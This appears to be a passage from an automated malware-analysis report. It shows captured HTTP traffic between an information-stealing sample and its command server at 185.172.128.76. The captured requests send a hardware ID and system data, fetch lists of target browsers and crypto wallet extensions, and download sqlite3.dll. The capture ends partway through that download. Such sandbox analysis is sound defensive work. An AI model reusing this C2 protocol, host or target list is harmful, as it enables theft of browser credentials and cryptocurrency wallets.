                                                                                                                                                                                                                                            4192.168.2.749703185.172.128.76803912C:\Users\user\AppData\Local\Temp\u48o.0.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:13.365490913 CEST417OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----AAEBAFBGIDHCBFHIECFC
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 216
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 32 44 30 30 41 35 41 30 43 36 32 35 30 37 32 38 36 39 35 38 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 2d 2d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: ------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="hwid"5F2D00A5A0C62507286958------AAEBAFBGIDHCBFHIECFCContent-Disposition: form-data; name="build"default10------AAEBAFBGIDHCBFHIECFC--
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:13.753421068 CEST347INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:13 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 152
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Data Raw: 5a 6a 6c 6c 59 57 52 6c 5a 57 4e 6a 5a 57 5a 6d 4d 44 4e 69 4e 47 46 6a 4d 6a 59 7a 4e 32 49 77 4d 44 41 78 4d 47 49 77 4e 54 68 68 4d 6d 49 34 59 6a 42 6c 5a 47 52 68 5a 6a 68 6d 4d 44 4e 6c 59 57 59 7a 5a 6a 63 30 4e 44 49 31 4d 6a 41 79 59 32 5a 69 59 6d 51 30 4e 7a 42 6b 4e 54 63 34 66 44 45 34 4d 54 67 78 4e 6a 5a 38 4e 54 45 35 4d 54 6b 78 4f 44 67 31 4c 6d 5a 70 62 47 56 38 4d 58 77 77 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 41 3d 3d
                                                                                                                                                                                                                                            Data Ascii: ZjllYWRlZWNjZWZmMDNiNGFjMjYzN2IwMDAxMGIwNThhMmI4YjBlZGRhZjhmMDNlYWYzZjc0NDI1MjAyY2ZiYmQ0NzBkNTc4fDE4MTgxNjZ8NTE5MTkxODg1LmZpbGV8MXwwfDF8MXwxfDF8MXwxfA==
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:13.760483980 CEST469OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBK
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 268
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: ------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------IEBFHCAKFBGDHIDHIDBKContent-Disposition: form-data; name="message"browsers------IEBFHCAKFBGDHIDHIDBK--
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.069288015 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:13 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 1520
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62
                                                                                                                                                                                                                                            Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.069308996 CEST427INData Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39
                                                                                                                                                                                                                                            Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.083688021 CEST468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----GIJDGCAEBFIIECAKFHIJ
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 267
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65 65 63 63 65 66 66 30 33 62 34 61 63 32 36 33 37 62 30 30 30 31 30 62 30 35 38 61 32 62 38 62 30 65 64 64 61 66 38 66 30 33 65 61 66 33 66 37 34 34 32 35 32 30 32 63 66 62 62 64 34 37 30 64 35 37 38 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 44 47 43 41 45 42 46 49 49 45 43 41 4b 46 48 49 4a 2d 2d 0d 0a
                                                                                                                                                                                                                                            Data Ascii: ------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------GIJDGCAEBFIIECAKFHIJContent-Disposition: form-data; name="message"plugins------GIJDGCAEBFIIECAKFHIJ--
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.396563053 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:14 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 5416
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62
                                                                                                                                                                                                                                            Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhb
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.396579027 CEST1289INData Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64
                                                                                                                                                                                                                                            Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.396599054 CEST1289INData Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c
                                                                                                                                                                                                                                            Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.396610975 CEST1289INData Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62
                                                                                                                                                                                                                                            Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.396627903 CEST456INData Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57
                                                                                                                                                                                                                                            Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.418423891 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EBGDHJECFCFCAKFHCFID
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Content-Length: 6911
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.418423891 CEST6911OUTData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 44 48 4a 45 43 46 43 46 43 41 4b 46 48 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 65 61 64 65
                                                                                                                                                                                                                                            Data Ascii: ------EBGDHJECFCFCAKFHCFIDContent-Disposition: form-data; name="token"f9eadeecceff03b4ac2637b00010b058a2b8b0eddaf8f03eaf3f74425202cfbbd470d578------EBGDHJECFCFCAKFHCFIDContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:14.746701956 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:14 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:15.070194960 CEST93OUTGET /15f649199f40275b/sqlite3.dll HTTP/1.1
                                                                                                                                                                                                                                            Host: 185.172.128.76
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Apr 23, 2024 09:43:15.380364895 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                            Date: Tue, 23 Apr 2024 07:43:15 GMT
                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
